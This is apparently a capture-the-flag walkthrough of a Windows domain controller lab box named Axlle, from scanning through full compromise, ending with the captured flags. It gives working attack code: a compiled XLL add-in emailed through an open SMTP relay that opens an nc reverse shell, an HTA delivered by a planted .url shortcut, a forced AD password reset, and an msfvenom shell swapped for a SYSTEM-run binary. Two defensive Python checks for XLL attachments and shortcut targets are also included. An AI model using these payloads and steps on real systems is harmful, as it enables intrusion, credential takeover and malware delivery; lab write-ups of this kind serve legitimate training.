
Nmap Results
# Nmap 7.94SVN scan initiated Mon Jun 24 13:41:37 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.90.84
Nmap scan report for 10.129.90.84
Host is up (0.017s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Axlle Development
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-24 17:42:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: AXLLE
| NetBIOS_Domain_Name: AXLLE
| NetBIOS_Computer_Name: MAINFRAME
| DNS_Domain_Name: axlle.htb
| DNS_Computer_Name: MAINFRAME.axlle.htb
| DNS_Tree_Name: axlle.htb
| Product_Version: 10.0.20348
|_ System_Time: 2024-06-24T17:45:11+00:00
| ssl-cert: Subject: commonName=MAINFRAME.axlle.htb
| Not valid before: 2024-05-19T11:25:03
|_Not valid after: 2024-11-18T11:25:03
|_ssl-date: 2024-06-24T17:45:51+00:00; +12s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
54306/tcp open msrpc Microsoft Windows RPC
63807/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
63808/tcp open msrpc Microsoft Windows RPC
64655/tcp open msrpc Microsoft Windows RPC
64669/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MAINFRAME; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-06-24T17:45:13
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 11s, deviation: 0s, median: 11s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 24 13:45:40 2024 -- 1 IP address (1 host up) scanned in 242.62 seconds
nmap output
- On tcp/389 we see a domain of axlle.htb
- On tcp/3389 we see commonName=MAINFRAME.axlle.htb
Let's go ahead and get those added to our /etc/hosts file:
echo -e '10.129.90.84\taxlle.htb mainframe.axlle.htb' | sudo tee -a /etc/hosts
Service Enumeration
TCP/53
host -l axlle.htb 10.129.90.84
TCP/445
smbclient -N -L //mainframe.axlle.htb


nxc or enum4linux
TCP/88

cat /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt | tr '[:upper:]' '[:lower:]' | sort -u > kerberos_users.txt
kerbrute userenum -d axlle.htb --dc 10.129.90.84 -t 100 -o kerbrute.log ./kerberos_users.txt

grep '@' kerbrute.log | awk -v FS=' ' '{print $7}' | cut -d '@' -f 1 > domain_users.txt

TCP/80


Penetration Testing
There don't appear to be any robots.txt or sitemap.xml files that would reveal additional directories or files on the web server; nothing interesting in the site source code. So, we'll need to do some brute forcing via a tool such as gobuster.

tcp/25 is open on the box, so we could email an Excel-format document to the target account and possibly get some kind of interaction.
Gobuster Enumeration
Virtual Hosts
http://axlle.htb and http://mainframe.axlle.htb load the same content, so virtual hosts do not seem to be configured on this server.
gobuster vhost -k --domain axlle.htb --append-domain -u http://10.129.90.84 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
No additional virtual hosts found using this word list.
Directories and Files
gobuster dir -u http://axlle.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -o axlle.htb.txt -t 100
/assets (Status: 301) [Size: 147] [--> http://axlle.htb/assets/]
/css (Status: 301) [Size: 144] [--> http://axlle.htb/css/]
/js (Status: 301) [Size: 143] [--> http://axlle.htb/js/]
Nothing particularly interesting.
TCP/25

We know we need to send an Excel-formatted document to the target, and the payload must not be a macro.

HackTricks shows we can use sendEmail or swaks as CLI tools to send the email.

I looked at some Excel payloads on a few different knowledge bases, but this one was the only one I could find with an Excel payload that didn't need a macro -- an XLL file.
Referencing this page, we see that .xll files are more or less .dll files for Excel; we also see an example of how to cross-compile one on Linux.
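As an added, defensive counterpart to the XLL-by-email delivery described above (this is not code from the writeup), here is a mail-filter style check in Python that opens an .eml, walks its attachments and flags anything that looks like an XLL add-in: the .xll extension, an MZ/PE image (an XLL is a DLL whatever it is named), or the xlAutoOpen export name an XLL carries. The sample message and the stand-in XLL bytes are constructed inline; no real add-in is needed.

```python
import email
from email import policy
from email.message import EmailMessage

# Export names Excel resolves in an XLL; xlAutoOpen is the one the page's payload uses.
XLL_EXPORT_NAMES = (b"xlAutoOpen", b"xlAutoClose", b"xlAddInManagerInfo")
BLOCKED_EXTENSIONS = (".xll", ".dll", ".exe", ".hta", ".scr")


def is_pe_image(data: bytes) -> bool:
    """True if data starts with an MZ stub whose e_lfanew points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def classify_attachment(filename: str, data: bytes) -> list:
    """Return the reasons an attachment should be blocked (empty list = allow)."""
    reasons = []
    if (filename or "").lower().endswith(BLOCKED_EXTENSIONS):
        reasons.append("blocked extension")
    if is_pe_image(data):
        reasons.append("PE image")          # catches an XLL renamed to .xls/.bin
    if any(name in data for name in XLL_EXPORT_NAMES):
        reasons.append("XLL export names")  # the export table keeps these as ASCII
    return reasons


def scan_eml(raw: bytes) -> list:
    """Walk every attachment of an RFC 5322 message and give each a verdict."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    results = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        reasons = classify_attachment(part.get_filename(), data)
        results.append({"filename": part.get_filename(),
                        "verdict": "block" if reasons else "allow",
                        "reasons": reasons})
    return results


def build_fake_xll() -> bytes:
    """Constructed stand-in for an XLL: MZ stub, e_lfanew, PE signature and one
    export-name string at a fixed offset. It is not a loadable image."""
    buf = bytearray(0x100)
    buf[0:2] = b"MZ"
    buf[0x3C:0x40] = (0x80).to_bytes(4, "little")
    buf[0x80:0x84] = b"PE\0\0"
    buf[0xC0:0xCA] = b"xlAutoOpen"
    return bytes(buf)


def build_sample_eml() -> bytes:
    """Constructed message shaped like the swaks send on this page: one XLL
    attachment plus one harmless text attachment."""
    msg = EmailMessage()
    msg["From"] = "pwn@pwn.htb"
    msg["To"] = "accounts@axlle.htb"
    msg["Subject"] = "Pwn"
    msg.set_content("Pwn")
    msg.add_attachment(build_fake_xll(), maintype="application",
                       subtype="octet-stream", filename="pwn.xll")
    msg.add_attachment("quarterly figures", subtype="plain", filename="notes.txt")
    return msg.as_bytes()


if __name__ == "__main__":
    for result in scan_eml(build_sample_eml()):
        print(result)
```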
Testing the Exploit

Use #include <windows.h> -- lowercase -- as the payload example above has it uppercase, which throws a compile error.
#include <windows.h>
__declspec(dllexport) void __cdecl xlAutoOpen(void);
void __cdecl xlAutoOpen() {
    // Triggers when Excel opens
    WinExec("cmd.exe /c ping 10.10.14.191", 1);
}
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
pwn.c -- Ping test to my VPN IP
x86_64-w64-mingw32-gcc pwn.c -o pwn.xll -s -Os -DUNICODE -shared
Again, I just removed the flags and references to the Excel SDK files to get a test compile.

sudo tcpdump -ni tun0 icmp
Start tcpdump and listen for ICMP traffic
swaks --to 'accounts@axlle.htb' --from 'pwn@pwn.htb' \
--header 'Subject: Pwn' --body 'Pwn' --server axlle.htb --attach @pwn.xll
Send the email to the target account via the open relay, being sure to attach the file with the @ sign included

Exploit
Reverse Shell
cp /usr/share/windows-binaries/nc.exe .
Copy the nc.exe binary to the current directory for hosting via SMB
sudo impacket-smbserver -smb2support -username evil -password evil myshare .
Start an ad-hoc SMB server to host nc.exe, with a share named myshare authenticated with the credentials evil:evil
#include <windows.h>
__declspec(dllexport) void __cdecl xlAutoOpen(void);
void __cdecl xlAutoOpen() {
    // Triggers when Excel opens
    WinExec("powershell -nop -noni -ep bypass -w hidden -command \"New-SmbMapping -LocalPath H: -RemotePath \\\\10.10.14.191\\myshare -UserName evil -password evil; H:\\nc.exe 10.10.14.191 443 -e powershell.exe\"", 1);
}
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
pwn.c -- Map the Kali SMB share and run nc.exe to create a reverse shell
x86_64-w64-mingw32-gcc pwn.c -o pwn.xll -s -Os -DUNICODE -shared && ls -l pwn.xll
Recompile the .xll file
sudo rlwrap nc -lnvp 443
Start the TCP listener on the target port
swaks --to 'accounts@axlle.htb' --from 'pwn@pwn.htb' \
--header 'Subject: Pwn' --body 'Pwn' --server axlle.htb --attach @pwn.xll
Send the email via the open relay to the target account, again attaching the file with the @ sign

Post-Exploit Enumeration
Operating Environment
OS & Kernel
WindowsBuildLabEx : 20348.1.amd64fre.fe_release.210507-1500
WindowsCurrentVersion : 6.3
WindowsEditionId : ServerStandard
WindowsInstallationType : Server
WindowsInstallDateFromRegistry : 1/1/1970 12:00:00 AM
WindowsProductId :
WindowsProductName : Windows Server 2022 Standard
WindowsRegisteredOrganization :
WindowsRegisteredOwner : Windows User
WindowsSystemRoot : C:\Windows
WindowsVersion : 2009
OSDisplayVersion : 21H2
BiosCharacteristics : {4, 7, 9, 11...}
BiosBIOSVersion : {INTEL - 6040000, VMW71.00V.21805430.B64.2305221826,
VMware, Inc. - 10000}
BiosBuildNumber :
BiosCaption : VMW71.00V.21805430.B64.2305221826
BiosCodeSet :
BiosCurrentLanguage :
BiosDescription : VMW71.00V.21805430.B64.2305221826
BiosEmbeddedControllerMajorVersion : 255
BiosEmbeddedControllerMinorVersion : 255
BiosFirmwareType : Uefi
BiosIdentificationCode :
BiosInstallableLanguages :
BiosInstallDate :
BiosLanguageEdition :
BiosListOfLanguages :
BiosManufacturer : VMware, Inc.
BiosName : VMW71.00V.21805430.B64.2305221826
BiosOtherTargetOS :
BiosPrimaryBIOS : True
BiosReleaseDate : 5/21/2023 5:00:00 PM
BiosSeralNumber : VMware-42 30 8b ab bc ed 60 7e-e4 b8 66 42 2d 84 a8 14
BiosSMBIOSBIOSVersion : VMW71.00V.21805430.B64.2305221826
BiosSMBIOSMajorVersion : 2
BiosSMBIOSMinorVersion : 7
BiosSMBIOSPresent : True
BiosSoftwareElementState : Running
BiosStatus : OK
BiosSystemBiosMajorVersion : 255
BiosSystemBiosMinorVersion : 255
BiosTargetOperatingSystem : 0
BiosVersion : INTEL - 6040000
CsAdminPasswordStatus : Enabled
CsAutomaticManagedPagefile : True
CsAutomaticResetBootOption : True
CsAutomaticResetCapability : True
CsBootOptionOnLimit : DoNotReboot
CsBootOptionOnWatchDog : DoNotReboot
CsBootROMSupported : True
CsBootStatus : {0, 0, 0, 33...}
CsBootupState : Normal boot
CsCaption : MAINFRAME
CsChassisBootupState : Safe
CsChassisSKUNumber :
CsCurrentTimeZone : -420
CsDaylightInEffect : True
CsDescription : AT/AT COMPATIBLE
CsDNSHostName : MAINFRAME
CsDomain : axlle.htb
CsDomainRole : PrimaryDomainController
CsEnableDaylightSavingsTime : True
CsFrontPanelResetStatus : Unknown
CsHypervisorPresent : True
CsInfraredSupported : False
CsInitialLoadInfo :
CsInstallDate :
CsKeyboardPasswordStatus : Unknown
CsLastLoadInfo :
CsManufacturer : VMware, Inc.
CsModel : VMware7,1
CsName : MAINFRAME
CsNetworkAdapters : {Ethernet0 2}
CsNetworkServerModeEnabled : True
CsNumberOfLogicalProcessors : 2
CsNumberOfProcessors : 2
CsProcessors : {AMD EPYC 7763 64-Core Processor , AMD EPYC
7763 64-Core Processor }
CsOEMStringArray : {[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7],
Welcome to the Virtual Machine}
CsPartOfDomain : True
CsPauseAfterReset : 3932100000
CsPCSystemType : Desktop
CsPCSystemTypeEx : Desktop
CsPowerManagementCapabilities :
CsPowerManagementSupported :
CsPowerOnPasswordStatus : Disabled
CsPowerState : Unknown
CsPowerSupplyState : Safe
CsPrimaryOwnerContact :
CsPrimaryOwnerName : Windows User
CsResetCapability : Other
CsResetCount : -1
CsResetLimit : -1
CsRoles : {LM_Workstation, LM_Server, Primary_Domain_Controller,
Timesource...}
CsStatus : OK
CsSupportContactDescription :
CsSystemFamily :
CsSystemSKUNumber :
CsSystemType : x64-based PC
CsThermalState : Safe
CsTotalPhysicalMemory : 4293926912
CsPhyicallyInstalledMemory : 4194304
CsUserName : AXLLE\Administrator
CsWakeUpType : PowerSwitch
CsWorkgroup :
OsName : Microsoft Windows Server 2022 Standard
OsType : WINNT
OsOperatingSystemSKU : StandardServerEdition
OsVersion : 10.0.20348
OsCSDVersion :
OsBuildNumber : 20348
OsHotFixes : {}
OsBootDevice : \Device\HarddiskVolume2
OsSystemDevice : \Device\HarddiskVolume3
OsSystemDirectory : C:\Windows\system32
OsSystemDrive : C:
OsWindowsDirectory : C:\Windows
OsCountryCode : 1
OsCurrentTimeZone : -420
OsLocaleID : 0409
OsLocale : en-US
OsLocalDateTime : 6/26/2024 3:32:09 PM
OsLastBootUpTime : 6/26/2024 7:06:50 AM
OsUptime : 08:25:18.5331881
OsBuildType : Multiprocessor Free
OsCodeSet : 1252
OsDataExecutionPreventionAvailable : True
OsDataExecutionPrevention32BitApplications : True
OsDataExecutionPreventionDrivers : True
OsDataExecutionPreventionSupportPolicy : OptOut
OsDebug : False
OsDistributed : False
OsEncryptionLevel : 256
OsForegroundApplicationBoost : Maximum
OsTotalVisibleMemorySize : 4193288
OsFreePhysicalMemory : 2658156
OsTotalVirtualMemorySize : 4914184
OsFreeVirtualMemory : 2919432
OsInUseVirtualMemory : 1994752
OsTotalSwapSpaceSize :
OsSizeStoredInPagingFiles : 720896
OsFreeSpaceInPagingFiles : 334044
OsPagingFiles : {C:\pagefile.sys}
OsHardwareAbstractionLayer : 10.0.20348.2031
OsInstallDate : 1/22/2023 1:35:28 AM
OsManufacturer : Microsoft Corporation
OsMaxNumberOfProcesses : 4294967295
OsMaxProcessMemorySize : 137438953344
OsMuiLanguages : {en-US}
OsNumberOfLicensedUsers :
OsNumberOfProcesses : 123
OsNumberOfUsers : 11
OsOrganization :
OsArchitecture : 64-bit
OsLanguage : en-US
OsProductSuites : {TerminalServices, TerminalServicesSingleSession}
OsOtherTypeDescription :
OsPAEEnabled :
OsPortableOperatingSystem : False
OsPrimary : True
OsProductType : DomainController
OsRegisteredUser : Windows User
OsSerialNumber : 00454-20165-01481-AA576
OsServicePackMajorVersion : 0
OsServicePackMinorVersion : 0
OsStatus : OK
OsSuites : {TerminalServices, TerminalServicesSingleSession}
OsServerLevel :
KeyboardLayout : en-US
TimeZone : (UTC-08:00) Pacific Time (US & Canada)
LogonServer :
PowerPlatformRole : Desktop
HyperVisorPresent : True
HyperVRequirementDataExecutionPreventionAvailable :
HyperVRequirementSecondLevelAddressTranslation :
HyperVRequirementVirtualizationFirmwareEnabled :
HyperVRequirementVMMonitorModeExtensions :
DeviceGuardSmartStatus : Off
DeviceGuardRequiredSecurityProperties :
DeviceGuardAvailableSecurityProperties :
DeviceGuardSecurityServicesConfigured :
DeviceGuardSecurityServicesRunning :
DeviceGuardCodeIntegrityPolicyEnforcementStatus :
DeviceGuardUserModeCodeIntegrityPolicyEnforcementStatus :
Current User
User Name SID
=================== =============================================
axlle\gideon.hamill S-1-5-21-1005535646-190407494-3473065389-1113
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
AXLLE\Accounts Group S-1-5-21-1005535646-190407494-3473065389-1104 Mandatory group, Enabled by default, Enabled group
AXLLE\Employees Group S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Users and Groups
Local Users
gideon.hamill
Domain Users
samAccountName MemberOf
-------------- --------
Administrator {CN=Group Policy Creator Owners,CN=Users,DC=axlle,DC=htb, CN=Domain Admins,CN=Users,DC=axlle,DC=htb...
Guest {}
krbtgt {CN=Denied RODC Password Replication Group,CN=Users,DC=axlle,DC=htb}
david.brice {}
frankie.rose {}
brad.shaw {}
samantha.jade {}
gideon.hamill {CN=Accounts,CN=Users,DC=axlle,DC=htb}
xavier.edmund {}
emily.cook {}
brooke.graham {}
trent.langdon {}
matt.drew {}
jess.adams {}
jacob.greeny {}
simon.smalls {}
dan.kendo {}
lindsay.richards {}
calum.scott {}
dallon.matrix {}
baz.humphries {}
Domain Groups
Remote Management Users
-----------------------
CN=Baz Humphries,DC=axlle,DC=htb
CN=Jacob Greeny,DC=axlle,DC=htb
Employees
---------
CN=Web Devs,CN=Users,DC=axlle,DC=htb
CN=App Devs,CN=Users,DC=axlle,DC=htb
CN=Sales,CN=Users,DC=axlle,DC=htb
CN=HR,CN=Users,DC=axlle,DC=htb
CN=Accounts,CN=Users,DC=axlle,DC=htb
Accounts
--------
CN=Lindsay Richards,DC=axlle,DC=htb
CN=Simon Smalls,DC=axlle,DC=htb
CN=Gideon Hamill,DC=axlle,DC=htb
CN=Brad Shaw,DC=axlle,DC=htb
HR
--
CN=Jess Adams,DC=axlle,DC=htb
CN=Samantha Jade,DC=axlle,DC=htb
CN=Frankie Rose,DC=axlle,DC=htb
CN=David Brice,DC=axlle,DC=htb
Sales
-----
CN=Matt Drew,DC=axlle,DC=htb
CN=Brooke Graham,DC=axlle,DC=htb
CN=Emily Cook,DC=axlle,DC=htb
CN=Xavier Edmund,DC=axlle,DC=htb
App Devs
--------
CN=Baz Humphries,DC=axlle,DC=htb
CN=Jacob Greeny,DC=axlle,DC=htb
Web Devs
--------
CN=Dallon Matrix,DC=axlle,DC=htb
CN=Calum Scott,DC=axlle,DC=htb
CN=Dan Kendo,DC=axlle,DC=htb
CN=Trent Langdon,DC=axlle,DC=htb
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::1f6
IPv6 Address. . . . . . . . . . . : dead:beef::f77f:54f1:1937:993d
Link-local IPv6 Address . . . . . : fe80::6830:724b:c4a5:f46d%11
IPv4 Address. . . . . . . . . . . : 10.129.111.107
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:2bb5%11
10.129.0.1
Open Ports
0.0.0.0 110
0.0.0.0 143
0.0.0.0 587
0.0.0.0 636
0.0.0.0 3269
0.0.0.0 3268
Processes and Services
Interesting Processes
456 40 16552 21872 2684 0 hMailServer
Interesting Services
Name : hMailServer
StartName : LocalSystem
PathName : "C:\Program Files (x86)\hMailServer\Bin\hMailServer.exe" RunAsService
Interesting Files
C:\Program Files (x86)\hMailServer\data\axlle.htb\dallon.matrix\2F\{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml
# How I discovered the file
cd "C:\Program Files (x86)"
gci -file -r -ea silentlycontinue | select fullname
Return-Path: webdevs@axlle.htb
Received: from bumbag (Unknown [192.168.77.153])
by MAINFRAME with ESMTP
; Mon, 1 Jan 2024 06:32:24 -0800
Date: Tue, 02 Jan 2024 01:32:23 +1100
To: dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb
From: webdevs@axlle.htb
Subject: OSINT Application Testing
Message-Id: <20240102013223.019081@bumbag>
X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
Hi everyone,
The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.
We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.
Yours in click-worthy URLs,
The Web Dev Team
Privilege Escalation
Read Access on Stored Email
During the post-exploit enumeration phase, I followed my typical procedure and found the hMailServer application running as a service on the target. So, I navigated to the install directory, recursively searched for files there, and noted read access on C:\Program Files (x86)\hMailServer\data\axlle.htb\dallon.matrix\2F\{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml (see above).
The email contains an internal message asking the team to drop web shortcuts in C:\inetpub\testing to automate the checking and addition of URLs on the OSINT portal. So, it sounds like a scheduled task of some sort will read any files dropped there.
We know this much:
- It needs to be a file in C:\inetpub\testing
- It needs to be a web shortcut pointing to a URL
Creating a Malicious URL Shortcut
.url file extension

Testing the Shortcut File on the Target
@'
[InternetShortcut]
IDList=
URL=http://10.10.14.191/pwn.txt
'@ > C:\inetpub\testing\test.url
Create the URL shortcut file on the target and store it in the target path

The User-Agent string here is very helpful, as it lets us make a more informed determination of how we might exploit the client requesting files from our web server. In this case, the Trident/7.0 user agent string is particularly interesting.
More information about the Trident HTTP client

We should be able to serve a .hta file from our web server and have it executed by the Trident MSHTML client.

More information about .hta files
Reverse Shell via Shortcut
.hta file, but could not get the exploit to run when served over HTTP. I tried Python http.server and Nginx. The client did retrieve the file, but did not run the exploit. So, I decided to try another URL scheme to serve the file. Schemes I tried are:
❌ http://
❌ ftp://
✅ file://
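From the defender's side, the automation that picks shortcuts up from C:\inetpub\testing should never follow a file:// or UNC target like the one used above. As an added example (not code from the writeup), this Python validator parses the [InternetShortcut] INI format and only accepts plain http/https targets, rejecting file:/UNC paths, missing hosts and executable-looking targets such as .hta; the sample shortcut contents are constructed inline.

```python
import configparser
from pathlib import Path
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
# Targets an MSHTML/Trident fetch could execute rather than merely display.
EXECUTABLE_SUFFIXES = (".hta", ".exe", ".dll", ".xll", ".js", ".vbs",
                       ".ps1", ".lnk", ".scr", ".bat", ".cmd")


def parse_internet_shortcut(text: str) -> dict:
    """Return the [InternetShortcut] keys (lower-cased) of a .url file body."""
    cp = configparser.ConfigParser(interpolation=None)  # keep '%' in URLs literal
    cp.read_string(text)
    section = next((s for s in cp.sections() if s.lower() == "internetshortcut"), None)
    if section is None:
        raise ValueError("no [InternetShortcut] section")
    return {k.lower(): v.strip() for k, v in cp.items(section)}


def _is_remote_path(value: str) -> bool:
    """UNC paths (\\\\host\\share\\x) and file: URLs both pull content from SMB."""
    return value.strip().lower().startswith(("\\\\", "//", "file:"))


def classify_shortcut(text: str) -> tuple:
    """Return (accepted, reason) for the raw contents of one .url file."""
    try:
        fields = parse_internet_shortcut(text)
    except (configparser.Error, ValueError) as exc:
        return False, f"unparseable: {exc}"
    url = fields.get("url", "")
    if not url:
        return False, "missing URL"
    if _is_remote_path(url):
        return False, "UNC/file target"
    parsed = urlparse(url)
    scheme = parsed.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme '{scheme or 'none'}' not allowed"
    if not parsed.hostname:
        return False, "missing host"
    if parsed.path.lower().endswith(EXECUTABLE_SUFFIXES):
        return False, "executable target"
    # IconFile may also name a remote path; treat it like the URL itself.
    if _is_remote_path(fields.get("iconfile", "")):
        return False, "remote IconFile"
    return True, "ok"


def audit_folder(folder: str) -> dict:
    """Map every *.url file in folder to its (accepted, reason) verdict."""
    return {p.name: classify_shortcut(p.read_text(errors="replace"))
            for p in Path(folder).glob("*.url")}


# Constructed samples mirroring the shortcut bodies used on this page.
SAMPLE_OK = "[InternetShortcut]\nIDList=\nURL=http://10.10.14.191/pwn.txt\n"
SAMPLE_HTA_OVER_SMB = "[InternetShortcut]\nIDList=\nURL=file://10.10.14.191/myshare/file.hta\n"
SAMPLE_HTA_OVER_HTTP = "[InternetShortcut]\nURL=http://10.10.14.191/file.hta\n"

if __name__ == "__main__":
    for label, body in (("ok", SAMPLE_OK), ("smb-hta", SAMPLE_HTA_OVER_SMB),
                        ("http-hta", SAMPLE_HTA_OVER_HTTP)):
        print(label, classify_shortcut(body))
```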
sudo impacket-smbserver -smb2support myshare .
Start an open SMB server on Kali to host the files for the exploit
net use H: \\10.10.14.191\myshare /persistent:yes
cp H:\nc.exe C:\Windows\Tasks\nc.exe
We should be able to use the H: drive from before and copy nc.exe locally for reuse
icacls C:\Windows\Tasks\nc.exe /grant Everyone:F
We want to enable all users to run the exploit
nano file.hta
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "cmd.exe /c C:\\Windows\\Tasks\\nc.exe 10.10.14.191 443 -e powershell.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>
file.hta
sudo rlwrap nc -lnvp 443
Start the TCP listener to catch the reverse shell
@'
[InternetShortcut]
IDList=
URL=file://10.10.14.191/myshare/file.hta
'@ > C:\inetpub\testing\test.url
Create the URL shortcut in the target directory using a PowerShell Here-String

Press the Enter key a couple of times when pasting the Here-String into the reverse shell.
Lateral to Dallon Matrix
Bloodhound Enumeration
After some lengthy enumeration, I couldn't find any local privilege escalation paths via the file system or any installed programs, so it was time to look at the domain level...

sudo neo4j console &
Start the database
sudo bloodhound &
Start BloodHound
wget https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
Download the latest SharpHound.exe collector
sudo python3 -m http.server 80
Host SharpHound.exe via an HTTP server because, for whatever reason, it wouldn't copy from my SMB server
iwr http://10.10.14.191/SharpHound.exe -o sh.exe
Download the collector to the target and save it
.\sh.exe -c all
Run the collector and gather all the data from the domain that we can
# Remap the share
net use H: \\10.10.14.191\myshare
# Copy the BloodHound archive
cp 20240627153013_BloodHound.zip H:\
Transfer the BloodHound archive to Kali
From here, we unzip the bloodhound.zip archive and drag and drop the .json files into the Bloodhound window to upload the data.


- dallon.matrix is in the Web Devs group, which has ForceChangePassword on baz.humphries
- baz.humphries can WinRM to the domain controller and is a member of the App Devs group, which I believe will give us access to C:\App Development
Lateral to Baz Humphries
$pw = ConvertTo-SecureString -AsPlainText -Force 'P@$$word123'
Set-ADAccountPassword -Identity baz.humphries -Reset -NewPassword $pw

evil-winrm -i axlle.htb -u 'baz.humphries' -p 'P@$$word123'
Interesting Files
C:\App Development\kbfiltr\README.md
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**

The binary that runs as SYSTEM here is writable by our user group, App Devs, so we should be able to get an elevated shell that way.
Becoming Administrator
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.191 LPORT=443 -b '\x00' -e 'x64/xor_dynamic' -f exe -o standalonerunner.exe
Create the impostor binary on Kali

Use the upload function in evil-winrm to transfer the binary to the target
sudo rlwrap nc -lnvp 443
Start a TCP listener
cp .\standalonerunner.exe 'C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe'
Overwrite the binary


Flags
User
99e317bb6cacfc804db4577eac32677d
Root
70d7c776cbe82448a7e6822b3d16445a